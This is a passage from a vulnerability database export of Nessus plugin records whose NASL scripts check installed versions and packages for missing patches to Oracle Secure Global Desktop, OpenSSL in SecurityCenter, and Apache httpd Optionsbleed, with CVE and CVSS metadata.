script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05e0bcf5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:virtualization_secure_global_desktop\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_secure_global_desktop_installed.nbin\");\n script_require_keys(\"Host/Oracle_Secure_Global_Desktop/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp = \"Oracle Secure Global Desktop\";\nversion = get_kb_item_or_exit(\"Host/Oracle_Secure_Global_Desktop/Version\");\n\n# this check is for Oracle Secure Global Desktop packages built for Linux platform\nuname = get_kb_item_or_exit(\"Host/uname\");\nif (\"Linux\" >!< uname) audit(AUDIT_OS_NOT, \"Linux\");\n\nfix_required = NULL;\n\nif (version =~ \"^5\\.30($|\\.)\") fix_required = 'Patch_53p4';\n\nif (isnull(fix_required)) audit(AUDIT_INST_VER_NOT_VULN, \"Oracle Secure Global Desktop\", version);\n\npatches = get_kb_list(\"Host/Oracle_Secure_Global_Desktop/Patches\");\n\npatched = FALSE;\nforeach patch (patches)\n{\n if (patch == fix_required)\n {\n patched = TRUE;\n break;\n }\n}\n\nif (patched) audit(AUDIT_INST_VER_NOT_VULN, app, version + ' (with ' + fix_required + ')');\n\nreport = '\\n Installed version : ' + version +\n '\\n Patch required : ' + fix_required +\n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-10T17:25:44", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of OpenSSL.", "edition": 27, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2018-02-02T00:00:00", "title": "Tenable SecurityCenter OpenSSL 1.0.2 < 1.0.2n Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3737", "CVE-2018-0739", "CVE-2018-0733", "CVE-2017-3738"], "modified": "2018-02-02T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_OPENSSL_1_0_2N.NASL", "href": "https://www.tenable.com/plugins/nessus/106563", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106563);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2017-3737\",\n \"CVE-2017-3738\",\n \"CVE-2018-0733\",\n \"CVE-2018-0739\"\n );\n script_bugtraq_id(102103, 102118);\n\n script_name(english:\"Tenable SecurityCenter OpenSSL 1.0.2 < 1.0.2n Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of OpenSSL in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains an\nOpenSSL library that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of OpenSSL.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2018-04\");\n # https://docs.tenable.com/releasenotes/securitycenter/securitycenter79.htm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?706680e4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20171207.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.6.1 or later.\nAlternatively, apply SecurityCenter Patch SC-201801.1.5.x.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-0733\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/openssl/version\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\ninclude(\"install_func.inc\");\n\napp = \"OpenSSL (within SecurityCenter)\";\nfix = \"1.0.2n\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/openssl/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (\n openssl_ver_cmp(ver:version, fix:\"1.0.2\", same_branch:TRUE, is_min_check:FALSE) >= 0 &&\n openssl_ver_cmp(ver:version, fix:fix, same_branch:TRUE, is_min_check:FALSE) < 0\n)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter OpenSSL version : ' + version +\n '\\n Fixed OpenSSL version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:38:39", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "title": "Debian DLA-1102-1 : apache2 security update (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2-threaded-dev", "p-cpe:/a:debian:debian_linux:apache2.2-common", "p-cpe:/a:debian:debian_linux:apache2-dbg", "p-cpe:/a:debian:debian_linux:apache2-prefork-dev", "p-cpe:/a:debian:debian_linux:apache2-mpm-event", "p-cpe:/a:debian:debian_linux:apache2-doc", "p-cpe:/a:debian:debian_linux:apache2-suexec-custom", "p-cpe:/a:debian:debian_linux:apache2-suexec", "p-cpe:/a:debian:debian_linux:apache2.2-bin", "p-cpe:/a:debian:debian_linux:apache2-mpm-itk", "p-cpe:/a:debian:debian_linux:apache2-utils", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:apache2", "p-cpe:/a:debian:debian_linux:apache2-mpm-worker", "p-cpe:/a:debian:debian_linux:apache2-mpm-prefork"], "id": "DEBIAN_DLA-1102.NASL", "href": "https://www.tenable.com/plugins/nessus/103389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1102-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103389);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Debian DLA-1102-1 : apache2 security update (Optionsbleed)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec-custom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u12\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:50:14", "description": "Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. (CVE-2017-9798)", "edition": 15, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-12T00:00:00", "title": "Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-12T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "p-cpe:/a:fermilab:scientific_linux:mod_proxy_html", "p-cpe:/a:fermilab:scientific_linux:mod_session", "p-cpe:/a:fermilab:scientific_linux:httpd", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:mod_ldap", "p-cpe:/a:fermilab:scientific_linux:httpd-devel"], "id": "SL_20171011_HTTPD_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/103806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103806);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL7.x x86_64 (20171011) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A use-after-free flaw was found in the way httpd handled\n invalid and previously unregistered HTTP methods\n specified in the Limit directive used in an .htaccess\n file. A remote attacker could possibly use this flaw to\n disclose portions of the server memory, or cause httpd\n child process to crash. (CVE-2017-9798)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1710&L=scientific-linux-errata&F=&S=&P=9988\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e195877f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-debuginfo-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-devel-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"httpd-manual-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"httpd-tools-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ldap-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_proxy_html-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_session-2.4.6-67.el7_4.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"mod_ssl-2.4.6-67.el7_4.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-11-26T09:19:57", "description": "According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-10-13T00:00:00", "title": "Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-10-13T00:00:00", "cpe": ["cpe:/a:apache:httpd", "cpe:/a:apache:http_server"], "id": "APACHE_2_4_28.NASL", "href": "https://www.tenable.com/plugins/nessus/103838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103838);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/25\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_bugtraq_id(100872);\n\n script_name(english:\"Apache 2.4.x < 2.4.28 HTTP Vulnerability (OptionsBleed)\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache running on the remote\nhost is 2.4.x prior to 2.4.28. It is, therefore, affected by an HTTP\nvulnerability related to the <Limit {method}> directive in an \n.htaccess file.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.4.28\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.28 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9798\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:80);\n\napp_info = vcf::apache_http_server::combined_get_app_info(app:'Apache', port:port);\n\nconstraints = [\n { \"min_version\" : \"2.4\", \"fixed_version\" : \"2.4.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:19:40", "description": "Apache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. The\nattacker sends an unauthenticated OPTIONS HTTP request when attempting\nto read secret data. This is a use-after-free issue and thus secret\ndata is not always sent, and the specific data depends on many factors\nincluding configuration.(CVE-2017-9798)", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-19T00:00:00", "title": "Amazon Linux AMI : httpd24 / httpd (ALAS-2017-896) (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:httpd-manual", "p-cpe:/a:amazon:linux:mod24_ssl", "p-cpe:/a:amazon:linux:httpd24-manual", "p-cpe:/a:amazon:linux:httpd", "p-cpe:/a:amazon:linux:mod24_ldap", "p-cpe:/a:amazon:linux:mod24_proxy_html", "p-cpe:/a:amazon:linux:mod_ssl", "p-cpe:/a:amazon:linux:httpd24-tools", "p-cpe:/a:amazon:linux:httpd24-debuginfo", "p-cpe:/a:amazon:linux:httpd-debuginfo", "p-cpe:/a:amazon:linux:httpd-devel", "p-cpe:/a:amazon:linux:mod24_session", "p-cpe:/a:amazon:linux:httpd24-devel", "p-cpe:/a:amazon:linux:httpd24", "p-cpe:/a:amazon:linux:httpd-tools", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-896.NASL", "href": 